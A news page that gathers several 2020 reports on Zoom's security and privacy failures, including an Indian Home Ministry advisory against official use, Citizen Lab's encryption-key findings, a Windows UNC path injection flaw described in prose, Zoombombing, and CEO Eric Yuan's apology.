Indian Government says Zoomvideo app unsafe, must not beused for its meetings: Report
The MHA mentioned that "those private individuals who still would like to use Zoom for private purposes" should follow certain guidelines
Zoom app has apparently become a favorite and famous tool among people during the lockdown and it is being used by schools and many private players.
The Cyber Coordination Centre (CCC) of the Ministry of Home Affairs has warned people that the Zoom video conferencing app for meetings is not a safe platform for government and official use, IANS reported.
In the advisory, issued on April 12, it said that "secure use of Zoom meeting platform is for private individuals and not for use of government offices or official purposes". The government said that CERT-In on the same lines had been informed on February 6 and March 30 this year clarifying that "Zoom is not a safe platform".
In a set of guidelines for the safety of private users, the CCC division of the MHA mentioned that "those private individuals who still would like to use Zoom for private purposes" should follow certain guidelines like prevention of unauthorized entry in the conference room and unauthorized participants to carry out any malicious activity on terminals of others in the conference. The advisory also suggested to "avoid 'DOS' attacks by restricting users through passwords and access grant". Zoom app has apparently become a favorite and famous tool among people during the lockdown and it is being used by schools and many private players.
"Most of the settings can be done by logging into users Zoom account on the website, or installed application at PC/Laptop/Phone and also during conducting a conference," the guidelines from MHA mentions.
Officials in the Home Ministry told IANS that the app has some specific weaknesses so it is necessary to avoid its use for official purposes as it can encrypt meeting data.
A report had recently claimed that Zoom is also prone to hacking. The 'Zoom client for Windows' is vulnerable to the 'UNC path injection' vulnerability that could let remote attackers steal login credentials for victims' Windows systems, TheHacckeNews had reported.
As businesses, schools and colleges and millions of SMBs use video conferencing tool Zoom during the work-from-home scenario, the US Federal Bureau of Investigation (FBI) had warned people about porn material being popped up during the video meetings. The Boston branch of the law enforcement agency had also said it received multiple reports of Zoom conferences being disrupted by pornographic and/or hate images and threatening language.
With privacy concerns looming, Zoom app yet to appear on Indian radar
On Friday, Canada-based independent research organisation Citizen Lab found that Chinese servers were being used to distribute encryption and decryption keys for video conferences on Zoom
Even though there have been increasing reports of videoconferencing app Zoom being vulnerable to hacking, and a recent investigation revealed the company sends some encryption keys to China, alarm bells are yet to ring in India.
On Friday, Canada-based independent research organisation Citizen Lab found that Chinese servers were being used to distribute encryption and decryption keys for videoconferences on Zoom. “We suspect that keys may be distributed through these (Chinese) servers. A company primarily catering to North American clients that sometimes distributes encryption keys through servers in China is potentially concerning, given that Zoom may be legally obligated to disclose these keys to authorities in China,” the Citizen Lab researchers noted. In addition, it also found that the company’s claims about being end-to-end encrypted were misleading.
Zoom has become extremely popular in the past few weeks, with most parts of the world under lockdown due to the ongoing Covid-19 pandemic, and people working from home.The app even surpassed WhatsApp and TikTok in the number of downloads on Google Play store last week.
In response, Zoom Chief Executive Officer (CEO) Eric Yuan said in a blog post the same day, that in its haste to support the vast number of users it was adding, the company failed to fully implement its usual geofencing best practices. “However, in February, Zoom rapidly added capacity to our Chinese region to handle a massive increase in demand. In our haste, we mistakenly added our two Chinese data centers to a lengthy white list of back-up bridges, potentially enabling non-Chinese clients to — under extremely limited circumstances — connect to them,” he said.
The blogpost also said that the error had no impact on its Zoom for Government Cloud, a separate cloud service for government customers. Several Indian enterprises and even government meetings take place on Zoom.
Coupled with these revelations and earlier privacy concerns, including sharing user data with LinkedIn and Facebook and ‘Zoom bombing’, where people can enter Zoom meetings uninvited and share hate speech or pornographic images, the San José-based company has lost clients like Tesla and the New York City Department of Education.
In India, however, as Zoom gains popularity, there hasn’t been any large-scale impact; a large number of businesses and governments continue to use the platform.
The Indian Computer Emergency Response Team (CERT-In) put out an advisory on March 30 about ‘secure usage of Zoom videoconferencing application’, detailing the steps users should take to ensure their data remains protected.
“There is nothing as such that we have done. We checked with Zoom and they assured us that Indian data is not being sent to Chinese servers,” said a government official.
Similarly, companies which use Zoom extensively for meetings have been telling their employees to be more careful with the use of the software. A large firm in the information technology sector has been sending emails to its employees educating them on the proper and safe use of Zoom.
Cyber security experts, however, say that for more sensitive meetings, users should consider moving to alternative, more secure applications. “I recommend using other end-to-end encrypted video platforms to ensure privacy. Also, I would not recommend free software for sensitive or private meetings. For example, Cisco’s Webex, Signal, etc ensure the maximum level of security by adjusting the platform’s settings. To avoid being ‘Zoombombed’, users should avoid sharing the link or meeting ID on social media or other public websites,” said Manan Shah, founder and CEO of cyber security firm Avalance Global Solutions.
Rajshekhar Rajaharia, an independent cyber security researcher, said Zoom passwords for private meetings can also get indexed on Google. He cautioned users that while starting a meeting on Zoom, one should not share an invitation URL that is already having a password. “You can share a meeting ID and password separately because people can misuse the URL or they may be indexed by Google. Previously invitations to WhatsApp group chats were being indexed by Google,” he said.
Vulnerability in Zoom app let hackers steal your Windows password: Report
Another media report claimed that Zoom doesn't use end-to-end encryption to protect calling data of its users
Slammed for the lack of users privacy and security by the US Federal Bureau of Investigation (FBI) and cyber security experts, video meeting app Zoom is also prone to hacking, a new report has claimed, saying an unpatched bug can let hackers steal users Windows password. The Zoom client for Windows' is vulnerable to the 'UNC path injection' vulnerability that could let remote attackers steal login credentials for victims' Windows systems, reports TheHacckeNews. The latest finding by cyber security expert @_g0dmode, has also been "confirmed by researcher Matthew Hickey and Mohamed A. Baset,' the report said late Wednesday.
The attack involves the "SMB Relay technique" wherein Windows automatically exposes a user's login username and NTLM password hashes to a remote server, when attempting to connect and download a file hosted on it. "The attack is possible only because Zoom for Windows supports remote UNC paths, which converts such potentially insecure URLs into hyperlinks for recipients in a personal or group chat," the report claimed.
Besides Windows credentials, the vulnerability can also be exploited to launch any programme present on a targeted computer.
Zoom has been notified of this bug but the flaw is yet to be fixed.
"Users are advised to either use an alternative video conferencing software or Zoom in your web browser instead of the dedicated client app," said the report. Another media report claimed that Zoom doesn't use end-to-end encryption to protect calling data of its users.
As businesses, schools and colleges and millions of SMBs use video conferencing tool Zoom during the work-from-home scenario, the US Federal Bureau of Investigation (FBI) has warned people about porn material being popped up during the video meetings.
The Boston branch of the law enforcement agency said it has received multiple reports of Zoom conferences being disrupted by pornographic and/or hate images and threatening language.
The video conferencing app late last month updated its iOS app to remove the software development kit (SDK) that was providing users' data to Facebook through the Login with Facebook feature.
Coronavirus: I really messed up on security, says Zoom chief Eric Yuan
The service, once mostly used for client conferences and training webinars, has emerged in the coronavirus lockdown as a home for virtual cocktail hours, exercise classes, cabinet meetings
Chief Executive Officer Eric Yuan started the mea-culpa messaging with an April 1 blog post on Zoom Video Communication’s website, saying “we recognize that we have fallen short of the community’s — and our own — privacy and security expectations.”
Zoom’s boss embarked on an apology tour to reassure users that he’s working to improve security and privacy on the videoconferencing app that has emerged as the virtual town square of the coronavirus epidemic.
The service, once mostly used for client conferences and training webinars, has emerged in the coronavirus lockdown as a home for virtual cocktail hours, exercise classes, cabinet meetings and remote classroom learning. But during the 20-fold surge to 200 million daily members since the end of last year, the service has been hit by trolls interjecting porn or hijacking meetings and drawn regulators’ scrutiny about privacy.
Chief Executive Officer Eric Yuan started the mea-culpa messaging with an April 1 blog post on Zoom Video Communications’s website, saying “we recognise that we have fallen short of the community’s — and our own — privacy and security expectations.” He sounded similar notes in an interview in The Wall Street Journal and a Sunday appearance on CNN’s Reliable Sources.
“I really messed up as CEO, and we need to win their trust back,” Yuan told The Wall Street Journal. “This kind of thing shouldn’t have happened.”
The lapses have driven away customers including Elon Musk, who banned the use of Zoom for SpaceX and Tesla due to privacy concerns. New York City has directed its schools — a system with more than 1.1 million students — to move away from using Zoom as soon as possible.
“We will support staff and students in transitioning to different platforms such as Microsoft Teams that have the same capabilities with appropriate security measures in place,” said Danielle Filson, a spokeswoman for the New York City Department of Education. The company is working to protect privacy, including adding end-to-end encryption that is still months away, Yuan said. For now he’s trying to keep customers on board. Many of the problems stem from the fact that the app was geared toward enterprise clients with their own IT security teams; instead of the broad consumer app it’s become.
“We are still in the process of working with New York schools to make sure we do enforce security safety,” Yuan told CNN. Since the public-health crisis unfolded, Zoom has become the most downloaded free app on Apple’s iOS App Store, ahead of TikTok, DoorDash, and Disney+.